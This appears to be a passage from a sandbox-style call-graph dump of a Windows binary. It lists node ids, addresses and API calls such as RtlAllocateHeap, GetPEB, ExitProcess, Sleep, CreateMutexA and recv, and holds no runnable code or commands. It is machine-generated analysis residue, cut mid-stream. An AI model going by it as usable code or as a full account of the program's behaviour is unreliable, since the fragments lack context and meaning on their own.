11492->11495 11493->11470 11496 66cd6b GetPEB ExitProcess GetPEB RtlAllocateHeap 11494->11496 11497 66cf3e GetPEB ExitProcess GetPEB RtlAllocateHeap 11495->11497 11496->11493 11497->11493 11499 673068 RtlAllocateHeap 11498->11499 11500 66cee0 11499->11500 11501 672b07 RtlAllocateHeap 11500->11501 11502 66cf18 11501->11502 11503 66cf1f 11502->11503 11504 66cf3e GetPEB ExitProcess GetPEB RtlAllocateHeap 11502->11504 11503->11470 11504->11503 11506 66cce1 11505->11506 11507 673068 RtlAllocateHeap 11506->11507 11508 66ccfa 11507->11508 11509 672b07 RtlAllocateHeap 11508->11509 11510 66cd3f 11509->11510 11511 66cd46 11510->11511 11512 66cd6b GetPEB ExitProcess GetPEB RtlAllocateHeap 11510->11512 11511->11470 11512->11511 11514 6491c4 11513->11514 11517 6491d5 11514->11517 11518 649410 11514->11518 11516 64925b 11516->11197 11517->11197 11519 649549 11518->11519 11520 64943b 11518->11520 11521 6491a0 RtlAllocateHeap 11519->11521 11524 649482 11520->11524 11525 6494a9 11520->11525 11522 64954e 11521->11522 11523 632440 RtlAllocateHeap 11522->11523 11531 649493 11523->11531 11524->11522 11526 64948d 11524->11526 11529 64d312 RtlAllocateHeap 11525->11529 11525->11531 11528 64d312 RtlAllocateHeap 11526->11528 11527 666b9a RtlAllocateHeap 11530 649558 11527->11530 11528->11531 11529->11531 11530->11516 11531->11527 11532 649511 11531->11532 11532->11516 11539 6666e7 11540 6666f3 11539->11540 11541 666712 11540->11541 11542 6666fd 11540->11542 11547 66670d 11541->11547 11548 666670 11541->11548 11543 667443 RtlAllocateHeap 11542->11543 11544 666702 11543->11544 11545 666b8a RtlAllocateHeap 11544->11545 11545->11547 11549 666692 11548->11549 11550 66667d 11548->11550 11557 66668d 11549->11557 11564 669ef9 11549->11564 11551 667443 RtlAllocateHeap 11550->11551 11552 666682 11551->11552 11555 666b8a RtlAllocateHeap 11552->11555 11555->11557 11557->11547 11560 6666b5 11581 66ad7b 11560->11581 11563 66acb5 RtlAllocateHeap 11563->11557 11565 669f11 11564->11565 11569 6666a7 11564->11569 11566 66aea4 RtlAllocateHeap 11565->11566 11565->11569 11567 669f2f 11566->11567 11596 6702f8 11567->11596 11570 66aecb 11569->11570 11571 6666af 11570->11571 11572 66aee2 11570->11572 11574 66aea4 11571->11574 11572->11571 11573 66acb5 RtlAllocateHeap 11572->11573 11573->11571 11575 66aec5 11574->11575 11576 66aeb0 11574->11576 11575->11560 11577 667443 RtlAllocateHeap 11576->11577 11578 66aeb5 11577->11578 11579 666b8a RtlAllocateHeap 11578->11579 11580 66aec0 11579->11580 11580->11560 11582 66ada1 11581->11582 11583 66ad8c 11581->11583 11585 66adea 11582->11585 11590 66adc8 11582->11590 11584 667430 RtlAllocateHeap 11583->11584 11586 66ad91 11584->11586 11587 667430 RtlAllocateHeap 11585->11587 11589 667443 RtlAllocateHeap 11586->11589 11588 66adef 11587->11588 11591 667443 RtlAllocateHeap 11588->11591 11594 6666bb 11589->11594 11614 66acef 11590->11614 11593 66adf7 11591->11593 11595 666b8a RtlAllocateHeap 11593->11595 11594->11557 11594->11563 11595->11594 11597 670304 11596->11597 11598 670324 11597->11598 11599 67030c 11597->11599 11601 6703bf 11598->11601 11609 670356 11598->11609 11600 667430 RtlAllocateHeap 11599->11600 11602 670311 11600->11602 11603 667430 RtlAllocateHeap 11601->11603 11604 667443 RtlAllocateHeap 11602->11604 11605 6703c4 11603->11605 11612 670319 11604->11612 11606 667443 RtlAllocateHeap 11605->11606 11607 6703cc 11606->11607 11608 666b8a RtlAllocateHeap 11607->11608 11608->11612 11610 667443 RtlAllocateHeap 11609->11610 11609->11612 11611 67037d 11610->11611 11613 667430 RtlAllocateHeap 11611->11613 11612->11569 11613->11612 11615 66acfb 11614->11615 11616 66ad30 11615->11616 11617 66ad3b 11615->11617 11621 66ae08 11616->11621 11619 667443 RtlAllocateHeap 11617->11619 11620 66ad36 11619->11620 11620->11594 11632 66beaf 11621->11632 11623 66ae1e 11629 66ae98 11623->11629 11630 66740d RtlAllocateHeap 11623->11630 11624 66ae18 11624->11623 11626 66beaf RtlAllocateHeap 11624->11626 11631 66ae50 11624->11631 11625 66beaf RtlAllocateHeap 11625->11623 11627 66ae47 11626->11627 11628 66beaf RtlAllocateHeap 11627->11628 11628->11631 11629->11620 11630->11629 11631->11623 11631->11625 11633 66bed1 11632->11633 11634 66bebc 11632->11634 11636 667430 RtlAllocateHeap 11633->11636 11638 66bef6 11633->11638 11635 667430 RtlAllocateHeap 11634->11635 11637 66bec1 11635->11637 11639 66bf01 11636->11639 11640 667443 RtlAllocateHeap 11637->11640 11638->11624 11641 667443 RtlAllocateHeap 11639->11641 11642 66bec9 11640->11642 11643 66bf09 11641->11643 11642->11624 11644 666b8a RtlAllocateHeap 11643->11644 11644->11642 11645 63b6e1 11647 63b6ee 11645->11647 11646 647870 RtlAllocateHeap 11648 63b723 11646->11648 11647->11646 11649 647870 RtlAllocateHeap 11648->11649 11650 63b73b 11649->11650 11651 647870 RtlAllocateHeap 11650->11651 11652 63b753 11651->11652 11653 647870 RtlAllocateHeap 11652->11653 11654 63b765 11653->11654 11680 6340e0 11681 63412a 11680->11681 11683 634172 11681->11683 11684 633ea0 11681->11684 11685 633f08 11684->11685 11686 633ede 11684->11686 11687 633f18 11685->11687 11690 632bc0 11685->11690 11686->11683 11687->11683 11691 64d312 RtlAllocateHeap 11690->11691 11692 632bce 11691->11692 11700 64b777 11692->11700 11694 632c02 11695 632c09 11694->11695 11706 632c40 11694->11706 11695->11683 11697 632c18 11709 632520 11697->11709 11699 632c25 11701 64b784 11700->11701 11705 64b7a3 11700->11705 11712 64caa7 11701->11712 11703 64b794 11703->11705 11714 64b74e 11703->11714 11705->11694 11720 64b72b 11706->11720 11708 632c72 11708->11697 11710 6637dc RtlAllocateHeap 11709->11710 11711 632557 11710->11711 11711->11699 11713 64cac2 CreateThreadpoolWork 11712->11713 11713->11703 11715 64b757 11714->11715 11718 64ccfc 11715->11718 11717 64b771 11717->11705 11719 64cd11 TpPostWork 11718->11719 11719->11717 11721 64b737 11720->11721 11722 64b747 11720->11722 11721->11722 11724 64c9a8 11721->11724 11722->11708 11725 64c9bd TpReleaseWork 11724->11725 11725->11722 10124 66d6ef 10127 66d6fc 10124->10127 10125 66d727 RtlAllocateHeap 10126 66d73a 10125->10126 10125->10127 10127->10125 10127->10126 11752 6482f0 11760 6475d0 11752->11760 11754 648369 11755 648e70 RtlAllocateHeap 11754->11755 11756 648384 11754->11756 11755->11756 11757 648e70 RtlAllocateHeap 11756->11757 11759 6483d8 11756->11759 11758 64841e 11757->11758 11761 6475eb 11760->11761 11773 6476d4 11760->11773 11762 647761 11761->11762 11765 64766b 11761->11765 11766 647681 11761->11766 11767 64765a 11761->11767 11761->11773 11763 6491a0 RtlAllocateHeap 11762->11763 11764 647766 11763->11764 11768 632440 RtlAllocateHeap 11764->11768 11772 666b9a RtlAllocateHeap 11765->11772 11765->11773 11766->11765 11771 64d312 RtlAllocateHeap 11766->11771 11767->11764 11770 64d312 RtlAllocateHeap 11767->11770 11769 64776b 11768->11769 11770->11765 11771->11765 11772->11762 11773->11754 11779 6364fc 11781 636510 11779->11781 11780 666b9a RtlAllocateHeap 11783 6365a3 11780->11783 11781->11780 11782 636578 11781->11782 11784 647870 RtlAllocateHeap 11783->11784 11785 636676 11784->11785 11786 635b20 4 API calls 11785->11786 11787 63667c 11786->11787 11788 635b20 4 API calls 11787->11788 11789 636681 11788->11789 11790 632280 4 API calls 11789->11790 11791 636699 11790->11791 11792 647870 RtlAllocateHeap 11791->11792 11793 636702 11792->11793 11794 635b20 4 API calls 11793->11794 11795 63670d 11794->11795 11796 632280 4 API calls 11795->11796 11805 636727 11796->11805 11797 636822 11798 647f30 RtlAllocateHeap 11797->11798 11800 63686c 11798->11800 11799 647870 RtlAllocateHeap 11799->11805 11801 647f30 RtlAllocateHeap 11800->11801 11804 6368b3 11801->11804 11802 635b20 4 API calls 11802->11805 11803 632280 4 API calls 11803->11805 11805->11797 11805->11799 11805->11802 11805->11803 11857 632ad0 11858 632ada 11857->11858 11859 632adc 11857->11859 11860 64c19a 5 API calls 11859->11860 11861 632ae2 11860->11861 11862 639ad5 11863 639ad7 11862->11863 11864 647870 RtlAllocateHeap 11863->11864 11865 639bd9 11864->11865 11866 635b20 4 API calls 11865->11866 11867 639be1 11866->11867 11868 638a60 4 API calls 11867->11868 11869 639bf2 11868->11869 11870 648150 RtlAllocateHeap 11869->11870 11871 639c01 11870->11871 11872 63a0de 11874 63a0e6 11872->11874 11873 63a865 11876 666b9a RtlAllocateHeap 11873->11876 11874->11873 11875 63a1b9 11874->11875 11878 647f30 RtlAllocateHeap 11875->11878 11877 63a883 Sleep CreateMutexA 11876->11877 11880 63a8be 11877->11880 11879 63a833 11878->11879 11881 6320dc 11882 6320e6 11881->11882 11883 64d57e RtlAllocateHeap 11882->11883 11884 6320f2 11883->11884 11933 6388b0 11934 638a1a 11933->11934 11941 638908 11933->11941 11935 647870 RtlAllocateHeap 11935->11941 11936 635b20 4 API calls 11936->11941 11937 638a50 11944 648070 11937->11944 11938 647f30 RtlAllocateHeap 11938->11941 11940 638a55 11942 666b9a RtlAllocateHeap 11940->11942 11941->11934 11941->11935 11941->11936 11941->11937 11941->11938 11941->11940 11943 638a5a 11942->11943 11947 64c109 11944->11947 11946 64807a 11950 64c08d 11947->11950 11949 64c11a 11949->11946 11951 6322a0 RtlAllocateHeap 11950->11951 11952 64c09f 11951->11952 11952->11949 11953 636ab9 11957 636ad1 11953->11957 11954 647f30 RtlAllocateHeap 11955 636b7c 11954->11955 11956 6491b0 RtlAllocateHeap 11955->11956 11958 636b8d 11956->11958 11957->11954 11957->11958 11959 647f30 RtlAllocateHeap 11958->11959 11960 636cb3 11959->11960 12026 632080 12027 64c5bb 2 API calls 12026->12027 12028 63208c 12027->12028 12029 64d57e RtlAllocateHeap 12028->12029 12030 632096 12029->12030 11971 632e80 11972 632ec6 11971->11972 11973 632f3e GetCurrentThreadId 11971->11973 11976 64c5dc GetSystemTimePreciseAsFileTime 11972->11976 11974 632faf 11973->11974 11975 632f54 11973->11975 11975->11974 11982 64c5dc GetSystemTimePreciseAsFileTime 11975->11982 11977 632ed2 11976->11977 11978 632fde 11977->11978 11979 632edd 11977->11979 11980 64c19a 5 API calls 11978->11980 11983 64d312 RtlAllocateHeap 11979->11983 11986 632ef0 11979->11986 11981 632fe4 11980->11981 11984 64c19a 5 API calls 11981->11984 11985 632f79 11982->11985 11983->11986 11984->11985 11988 64c19a 5 API calls 11985->11988 11989 632f80 11985->11989 11986->11981 11987 632f2f 11986->11987 11987->11973 11987->11974 11988->11989 11990 64c19a 5 API calls 11989->11990 11991 632f98 11989->11991 11990->11991 11991->11974 11992 64c19a 5 API calls 11991->11992 11993 632ffc 11992->11993 11994 64c5dc GetSystemTimePreciseAsFileTime 11993->11994 11995 633040 11994->11995 11996 633185 11995->11996 11998 63318b 11995->11998 12002 633167 11995->12002 12005 6330f2 GetCurrentThreadId 11995->12005 11997 64c19a 5 API calls 11996->11997 11997->11998 11999 64c19a 5 API calls 11998->11999 12000 633191 11999->12000 12001 64c19a 5 API calls 12000->12001 12008 633153 12001->12008 12003 64c19a 5 API calls 12004 63319d 12003->12004 12005->12002 12006 6330fb 12005->12006 12006->12002 12007 64c5dc GetSystemTimePreciseAsFileTime 12006->12007 12009 63311f 12007->12009 12008->12002 12008->12003 12009->11996 12009->12000 12009->12008 12010 64bc7c GetSystemTimePreciseAsFileTime 12009->12010 12010->12009 12046 635e86 12048 635e91 12046->12048 12047 635f0e 12048->12047 12049 666b9a RtlAllocateHeap 12048->12049 12050 635f2b 12049->12050 12051 647f30 RtlAllocateHeap 12050->12051 12052 635f99 12051->12052 12053 647f30 RtlAllocateHeap 12052->12053 12054 635fcd 12053->12054 12055 647f30 RtlAllocateHeap 12054->12055 12056 635ffe 12055->12056 12057 647f30 RtlAllocateHeap 12056->12057 12058 63602f 12057->12058 12059 647f30 RtlAllocateHeap 12058->12059 12061 636060 12059->12061 12060 636578 12061->12060 12062 666b9a RtlAllocateHeap 12061->12062 12063 6365a3 12062->12063 12064 647870 RtlAllocateHeap 12063->12064 12065 636676 12064->12065 12066 635b20 4 API calls 12065->12066 12067 63667c 12066->12067 12068 635b20 4 API calls 12067->12068 12069 636681 12068->12069 12070 632280 4 API calls 12069->12070 12071 636699 12070->12071 12072 647870 RtlAllocateHeap 12071->12072 12073 636702 12072->12073 12074 635b20 4 API calls 12073->12074 12075 63670d 12074->12075 12076 632280 4 API calls 12075->12076 12085 636727 12076->12085 12077 636822 12078 647f30 RtlAllocateHeap 12077->12078 12080 63686c 12078->12080 12079 647870 RtlAllocateHeap 12079->12085 12081 647f30 RtlAllocateHeap 12080->12081 12084 6368b3 12081->12084 12082 635b20 4 API calls 12082->12085 12083 632280 4 API calls 12083->12085 12085->12077 12085->12079 12085->12082 12085->12083 12086 668a81 12087 6686d7 4 API calls 12086->12087 12088 668a9f 12087->12088 12089 648090 12090 6475d0 RtlAllocateHeap 12089->12090 12091 6480e0 12090->12091 12092 648132 12091->12092 12094 648bd0 12091->12094 12095 648bf3 12094->12095 12096 648cf9 12094->12096 12100 648c35 12095->12100 12101 648c5f 12095->12101 12097 6491a0 RtlAllocateHeap 12096->12097 12098 648cfe 12097->12098 12099 632440 RtlAllocateHeap 12098->12099 12107 648c46 12099->12107 12100->12098 12102 648c40 12100->12102 12103 64d312 RtlAllocateHeap 12101->12103 12101->12107 12105 64d312 RtlAllocateHeap 12102->12105 12103->12107 12104 666b9a RtlAllocateHeap 12106 648d08 12104->12106 12105->12107 12107->12104 12108 648cbb 12107->12108 12108->12091 12149 666974 12150 666982 12149->12150 12151 66698c 12149->12151 12162 66b515 12150->12162 12153 6668bd 4 API calls 12151->12153 12155 6669a6 12153->12155 12154 666989 12156 66681d RtlAllocateHeap 12155->12156 12157 6669b3 12156->12157 12158 6669ba 12157->12158 12159 66b515 RtlAllocateHeap 12157->12159 12160 6669d8 12158->12160 12161 66acb5 RtlAllocateHeap 12158->12161 12159->12158 12161->12160 12163 66b522 12162->12163 12164 66b539 12163->12164 12165 66740d RtlAllocateHeap 12163->12165 12164->12154 12166 66b533 12165->12166 12166->12154 12210 63a348 12211 63a350 12210->12211 12212 63a86f 12211->12212 12213 63a423 12211->12213 12214 666b9a RtlAllocateHeap 12212->12214 12217 647f30 RtlAllocateHeap 12213->12217 12215 63a874 12214->12215 12216 666b9a RtlAllocateHeap 12215->12216 12218 63a879 12216->12218 12219 63a833 12217->12219 12220 666b9a RtlAllocateHeap 12218->12220 12221 63a87e 12220->12221 12222 63a883 Sleep CreateMutexA 12221->12222 12223 666b9a RtlAllocateHeap 12221->12223 12224 63a8be 12222->12224 12223->12222 12228 632b50 12229 632b8e 12228->12229 12230 64b72b TpReleaseWork 12229->12230 12231 632b9b 12230->12231 12232 633f5f 12233 633f85 12232->12233 12234 633f6d 12232->12234 12235 6323d0 5 API calls 12234->12235 12236 633f76 12235->12236 12237 633ca0 RtlAllocateHeap 12236->12237 12237->12233 10128 666559 10131 6663f7 10128->10131 10132 666405 10131->10132 10133 666450 10132->10133 10136 66645b 10132->10136 10135 66645a 10142 66a1c2 GetPEB 10136->10142 10138 666465 10139 66647a 10138->10139 10140 66646a GetPEB 10138->10140 10141 666492 ExitProcess 10139->10141 10140->10139 10143 66a1dc 10142->10143 10143->10138 12281 632130 12286 64c62c 12281->12286 12284 64d57e RtlAllocateHeap 12285 632144 12284->12285 12287 64c63c 12286->12287 12289 63213a 12286->12289 12287->12289 12290 64ceee 12287->12290 12289->12284 12291 64cc05 InitializeCriticalSectionEx 12290->12291 12292 64cf00 12291->12292 12292->12287 12293 633930 12294 64c5bb 2 API calls 12293->12294 12295 633967 12294->12295 12296 64c5bb 2 API calls 12295->12296 12297 6339a6 12296->12297 12298 633730 12299 63375b 12298->12299 12300 63378d 12299->12300 12301 666b9a RtlAllocateHeap 12299->12301 12302 6337cf 12301->12302 12338 635500 12339 635520 12338->12339 12340 632280 4 API calls 12339->12340 12341 635620 12339->12341 12340->12339 12342 638700 12343 638803 12342->12343 12352 638749 12342->12352 12344 647f30 RtlAllocateHeap 12343->12344 12350 638853 12344->12350 12345 63889c 12347 648070 RtlAllocateHeap 12345->12347 12346 647f30 RtlAllocateHeap 12346->12352 12349 6388a1 12347->12349 12348 638879 12350->12348 12351 666b9a RtlAllocateHeap 12350->12351 12351->12345 12352->12343 12352->12345 12352->12346 12352->12350 12361 648510 12362 648526 12361->12362 12362->12362 12363 64853b 12362->12363 12364 648e70 RtlAllocateHeap 12362->12364 12364->12363 12365 648d10 12366 648e5f 12365->12366 12369 648d35 12365->12369 12367 6491a0 RtlAllocateHeap 12366->12367 12368 648e64 12367->12368 12370 632440 RtlAllocateHeap 12368->12370 12371 648da6 12369->12371 12372 648d7c 12369->12372 12378 648d8d 12370->12378 12376 64d312 RtlAllocateHeap 12371->12376 12371->12378 12372->12368 12373 648d87 12372->12373 12375 64d312 RtlAllocateHeap 12373->12375 12374 666b9a RtlAllocateHeap 12377 648e6e 12374->12377 12375->12378 12376->12378 12378->12374 12379 648e1d 12378->12379 12380 63211a 12381 64c62c InitializeCriticalSectionEx 12380->12381 12382 632124 12381->12382 12383 64d57e RtlAllocateHeap 12382->12383 12384 63212e 12383->12384 12425 6399e8 12427 6399fc 12425->12427 12428 639a38 12427->12428 12429 647870 RtlAllocateHeap 12428->12429 12430 639aa4 12429->12430 12431 635b20 4 API calls 12430->12431 12432 639aac 12431->12432 12433 638a60 4 API calls 12432->12433 12434 639abd 12433->12434 12435 648150 RtlAllocateHeap 12434->12435 12436 639acc 12435->12436 12437 647870 RtlAllocateHeap 12436->12437 12438 639bd9 12437->12438 12439 635b20 4 API calls 12438->12439 12440 639be1 12439->12440 12441 638a60 4 API calls 12440->12441 12442 639bf2 12441->12442 12443 648150 RtlAllocateHeap 12442->12443 12444 639c01 12443->12444 12445 64cff7 12446 64d006 12445->12446 12447 64d0af 12446->12447 12448 64d0ab RtlWakeAllConditionVariable 12446->12448 12479 632dc0 12480 632de8 12479->12480 12481 64c5bb 2 API calls 12480->12481 12482 632df3 12481->12482 12496 63dfd0 recv 12497 63e032 recv 12496->12497 12498 63e067 recv 12497->12498 12499 63e0a1 12498->12499 12500 63e1c3 12499->12500 12501 64c5dc GetSystemTimePreciseAsFileTime 12499->12501 12502 63e1fe 12501->12502 12503 64c19a 5 API calls 12502->12503 12504 63e268 12503->12504 12545 633fa0 12546 633fe2 12545->12546 12547 634092 12546->12547 12548 63404c 12546->12548 12551 633ff5 12546->12551 12549 633ea0 4 API calls 12547->12549 12552 6335a0 12548->12552 12549->12551 12553 64d312 RtlAllocateHeap 12552->12553 12554 6335d6 12553->12554 12558 63360e 12554->12558 12559 632ca0 12554->12559 12556 63365e 12557 632bc0 4 API calls 12556->12557 12556->12558 12557->12558 12558->12551 12560 632cdd 12559->12560 12561 64be0f InitOnceExecuteOnce 12560->12561 12562 632d06 12561->12562 12563 632d48 12562->12563 12565 632d11 12562->12565 12568 64be27 12562->12568 12566 632400 4 API calls 12563->12566 12565->12556 12567 632d5b 12566->12567 12567->12556 12569 64be33 12568->12569 12577 6328c0 12569->12577 12571 64be53 12572 64bea3 12571->12572 12573 64be9a 12571->12573 12575 632aa0 5 API calls 12572->12575 12587 64bdaf 12573->12587 12576 64be9f 12575->12576 12576->12563 12578 647f30 RtlAllocateHeap 12577->12578 12579 63290f 12578->12579 12580 632670 RtlAllocateHeap 12579->12580 12581 632927 12580->12581 12582 63294d 12581->12582 12583 666b9a RtlAllocateHeap 12581->12583 12582->12571 12584 632976 12583->12584 12585 6637dc RtlAllocateHeap 12584->12585 12586 6329a4 12585->12586 12586->12571 12588 64cb61 InitOnceExecuteOnce 12587->12588 12589 64bdc7 12588->12589 12590 64bdce 12589->12590 12591 666beb 4 API calls 12589->12591 12590->12576 12592 64bdd7 12591->12592 12592->12576 12602 6359ae 12604 635971 12602->12604 12603 647f30 RtlAllocateHeap 12603->12604 12604->12602 12604->12603 12606 647870 RtlAllocateHeap 12604->12606 12607 635aed 12604->12607 12608 635640 12604->12608 12606->12604 12612 635770 12608->12612 12616 6356a9 12608->12616 12609 63583a 12610 648070 RtlAllocateHeap 12609->12610 12610->12612 12611 647f30 RtlAllocateHeap 12611->12616 12613 635810 12612->12613 12614 666b9a RtlAllocateHeap 12612->12614 12613->12604 12615 635844 12614->12615 12616->12609 12616->12611 12616->12612 12617 63a5b2 12618 63a5ba 12617->12618 12619 63a879 12618->12619 12620 63a68d 12618->12620 12621 666b9a RtlAllocateHeap 12619->12621 12623 647f30 RtlAllocateHeap 12620->12623 12622 63a87e 12621->12622 12624 63a883 Sleep CreateMutexA 12622->12624 12625 666b9a RtlAllocateHeap 12622->12625 12626 63a833 12623->12626 12627 63a8be 12624->12627 12625->12624 12628 6343b0 12629 64be0f InitOnceExecuteOnce 12628->12629 12630 6343ca 12629->12630 12631 6343d1 12630->12631 12632 666beb 4 API calls 12630->12632 12633 6343e4 12632->12633 12634 6485b0 12635 648610 12634->12635 12635->12635 12636 6475d0 RtlAllocateHeap 12635->12636 12637 648629 12636->12637 12638 648e70 RtlAllocateHeap 12637->12638 12639 648644 12637->12639 12638->12639 12640 648e70 RtlAllocateHeap 12639->12640 12642 648699 12639->12642 12641 6486e1 12640->12641 12643 6743b2 12644 6743bf 12643->12644 12645 6743cc 12643->12645 12646 667443 RtlAllocateHeap 12644->12646 12648 6743d8 12645->12648 12649 667443 RtlAllocateHeap 12645->12649 12647 6743c4 12646->12647 12650 6743f9 12649->12650 12651 666b8a RtlAllocateHeap 12650->12651 12651->12647 12652 635bbd 12654 635bbf 12652->12654 12653 635c27 12654->12653 12655 666b9a RtlAllocateHeap 12654->12655 12656 635c57 12655->12656 12656->12656 12657 647f30 RtlAllocateHeap 12656->12657 12659 635d4e 12657->12659 12658 635db6 12659->12658 12660 666b9a RtlAllocateHeap 12659->12660 12661 635de2 12660->12661 12662 635f0e 12661->12662 12663 666b9a RtlAllocateHeap 12661->12663 12664 635f2b 12663->12664 12665 647f30 RtlAllocateHeap 12664->12665 12666 635f99 12665->12666 12667 647f30 RtlAllocateHeap 12666->12667 12668 635fcd 12667->12668 12669 647f30 RtlAllocateHeap 12668->12669 12670 635ffe 12669->12670 12671 647f30 RtlAllocateHeap 12670->12671 12672 63602f 12671->12672 12673 647f30 RtlAllocateHeap 12672->12673 12675 636060 12673->12675 12674 636578 12675->12674 12676 666b9a RtlAllocateHeap 12675->12676 12677 6365a3 12676->12677 12678 647870 RtlAllocateHeap 12677->12678 12679 636676 12678->12679 12680 635b20 4 API calls 12679->12680 12681 63667c 12680->12681 12682 635b20 4 API calls 12681->12682 12683 636681 12682->12683 12684 632280 4 API calls 12683->12684 12685 636699 12684->12685 12686 647870 RtlAllocateHeap 12685->12686 12687 636702 12686->12687 12688 635b20 4 API calls 12687->12688 12689 63670d 12688->12689 12690 632280 4 API calls 12689->12690 12695 636727 12690->12695 12691 636822 12692 647f30 RtlAllocateHeap 12691->12692 12694 63686c 12692->12694 12693 647870 RtlAllocateHeap 12693->12695 12696 647f30 RtlAllocateHeap 12694->12696 12695->12691 12695->12693 12697 635b20 4 API calls 12695->12697 12699 632280 4 API calls 12695->12699 12698 6368b3 12696->12698 12697->12695 12699->12695 12743 632180 12744 632190 12743->12744 12745 63218b 12743->12745 12746 632194 12744->12746 12750 6321ac 12744->12750 12747 667443 RtlAllocateHeap 12746->12747 12748 632199 12747->12748 12751 666b8a RtlAllocateHeap 12748->12751 12749 6321bc 12750->12749 12752 6321e1 12750->12752 12753 6321fa 12750->12753 12754 6321a4 12751->12754 12755 667443 RtlAllocateHeap 12752->12755 12756 6321f1 12753->12756 12758 667443 RtlAllocateHeap 12753->12758 12757 6321e6 12755->12757 12759 666b8a RtlAllocateHeap 12757->12759 12760 632207 12758->12760 12759->12756 12761 666b8a RtlAllocateHeap 12760->12761 12762 632212 12761->12762 12763 64bd80 12766 64bcbb 12763->12766 12765 64bd96 12767 6322a0 RtlAllocateHeap 12766->12767 12768 64bccf 12767->12768 12768->12765 9987 63a786 9988 63a7a0 9987->9988 9995 63a7c2 9987->9995 9989 63a87e 9988->9989 9988->9995 9991 63a883 Sleep CreateMutexA 9989->9991 10011 666b9a 9989->10011 9994 63a8be 9991->9994 9993 63a833 9996 647f30 9995->9996 10000 647f4e 9996->10000 10001 647f74 9996->10001 9997 64805e 10019 6491a0 9997->10019 9999 648063 10022 632440 9999->10022 10000->9993 10001->9997 10003 647fed 10001->10003 10004 647fc8 10001->10004 10006 64d312 RtlAllocateHeap 10003->10006 10008 647fd9 10003->10008 10004->9999 10014 64d312 10004->10014 10006->10008 10009 648040 10008->10009 10010 666b9a RtlAllocateHeap 10008->10010 10009->9993 10010->9997 10012 666b26 RtlAllocateHeap 10011->10012 10013 666ba9 10012->10013 10015 632440 10014->10015 10016 64d331 10015->10016 10026 6637dc 10015->10026 10016->10008 10115 64c0e9 10019->10115 10023 63244e 10022->10023 10024 6637dc RtlAllocateHeap 10023->10024 10025 632483 10024->10025 10027 6637e9 10026->10027 10031 632483 10026->10031 10028 663816 10027->10028 10027->10031 10032 66a0b1 10027->10032 10041 668a66 10028->10041 10031->10008 10033 66a0be 10032->10033 10034 66a0cc 10032->10034 10033->10034 10037 66a0e3 10033->10037 10044 667443 10034->10044 10038 66a0de 10037->10038 10039 667443 RtlAllocateHeap 10037->10039 10038->10028 10040 66a0d4 10039->10040 10047 666b8a 10040->10047 10042 66acb5 RtlAllocateHeap 10041->10042 10043 668a7e 10042->10043 10043->10031 10050 66a688 10044->10050 10109 666b26 10047->10109 10049 666b96 10049->10038 10051 66a692 10050->10051 10059 667448 10051->10059 10061 66d6ef 10051->10061 10053 66a6d3 10054 66a6db 10053->10054 10055 66a713 10053->10055 10065 66acb5 10054->10065 10069 66a35f 10055->10069 10059->10040 10060 66acb5 RtlAllocateHeap 10060->10059 10064 66d6fc 10061->10064 10062 66d727 RtlAllocateHeap 10063 66d73a 10062->10063 10062->10064 10063->10053 10064->10062 10064->10063 10066 66acc0 10065->10066 10068 66acdb 10065->10068 10067 667443 RtlAllocateHeap 10066->10067 10066->10068 10067->10068 10068->10059 10070 66a3cd 10069->10070 10073 66a305 10070->10073 10072 66a3f6 10072->10060 10074 66a311 10073->10074 10077 66a4e6 10074->10077 10076 66a333 10076->10072 10078 66a4f5 10077->10078 10079 66a51c 10077->10079 10078->10079 10081 66f21f 10078->10081 10079->10076 10082 66f29f 10081->10082 10085 66f235 10081->10085 10083 66f2ed 10082->10083 10086 66acb5 RtlAllocateHeap 10082->10086 10084 66f390 RtlAllocateHeap 10083->10084 10099 66f2fb 10084->10099 10085->10082 10088 66f268 10085->10088 10093 66acb5 RtlAllocateHeap 10085->10093 10087 66f2c1 10086->10087 10089 66acb5 RtlAllocateHeap 10087->10089 10090 66f28a 10088->10090 10095 66acb5 RtlAllocateHeap 10088->10095 10091 66f2d4 10089->10091 10092 66acb5 RtlAllocateHeap 10090->10092 10094 66acb5 RtlAllocateHeap 10091->10094 10096 66f294 10092->10096 10098 66f25d 10093->10098 10100 66f2e2 10094->10100 10101 66f27f 10095->10101 10102 66acb5 RtlAllocateHeap 10096->10102 10097 66f35b 10103 66acb5 RtlAllocateHeap 10097->10103 10104 66edfc RtlAllocateHeap 10098->10104 10099->10097 10105 66acb5 RtlAllocateHeap 10099->10105 10106 66acb5 RtlAllocateHeap 10100->10106 10107 66eefa RtlAllocateHeap 10101->10107 10102->10082 10108 66f361 10103->10108 10104->10088 10105->10099 10106->10083 10107->10090 10108->10079 10110 66a688 RtlAllocateHeap 10109->10110 10111 666b31 10110->10111 10112 666b26 RtlAllocateHeap 10111->10112 10113 666b3f 10111->10113 10114 666b96 10112->10114 10113->10049 10114->10049 10118 64c053 10115->10118 10117 64c0fa 10121 6322a0 10118->10121 10120 64c065 10120->10117 10122 6637dc RtlAllocateHeap 10121->10122 10123 6322d7 10122->10123 10123->10120 12769 636d85 12770 636d92 12769->12770 12771 636dc5 12770->12771 12772 636d9a 12770->12772 12774 647f30 RtlAllocateHeap 12771->12774 12773 647f30 RtlAllocateHeap 12772->12773 12775 636dbb 12773->12775 12774->12775 12776 636e91 12775->12776 12777 666b9a RtlAllocateHeap 12775->12777 12778 636eb3 12777->12778 12779 63cb8d 12781 63cb98 12779->12781 12780 63cd1d 12781->12780 12782 63cd45 12781->12782 12783 647870 RtlAllocateHeap 12781->12783 12786 635b20 4 API calls 12781->12786 12792 648150 RtlAllocateHeap 12781->12792 12794 648e70 RtlAllocateHeap 12781->12794 12795 638f60 12781->12795 12784 666b9a RtlAllocateHeap 12782->12784 12783->12781 12785 63cd4a 12784->12785 12787 647870 RtlAllocateHeap 12785->12787 12786->12781 12788 63cda2 12787->12788 12790 635b20 4 API calls 12788->12790 12791 63cdad 12790->12791 12808 63c990 12791->12808 12792->12781 12794->12781 12796 638fb0 12795->12796 12797 647870 RtlAllocateHeap 12796->12797 12798 638fbf 12797->12798 12799 635b20 4 API calls 12798->12799 12800 638fca 12799->12800 12801 647f30 RtlAllocateHeap 12800->12801 12802 63901c 12801->12802 12803 648150 RtlAllocateHeap 12802->12803 12805 63902e 12803->12805 12804 6390ae 12804->12781 12805->12804 12806 666b9a RtlAllocateHeap 12805->12806 12807 6390da 12806->12807 12820 63c9fd 12808->12820 12809 63cd1d 12810 647870 RtlAllocateHeap 12810->12820 12811 63cd45 12813 666b9a RtlAllocateHeap 12811->12813 12812 635b20 4 API calls 12812->12820 12815 63cd4a 12813->12815 12814 638f60 4 API calls 12814->12820 12816 647870 RtlAllocateHeap 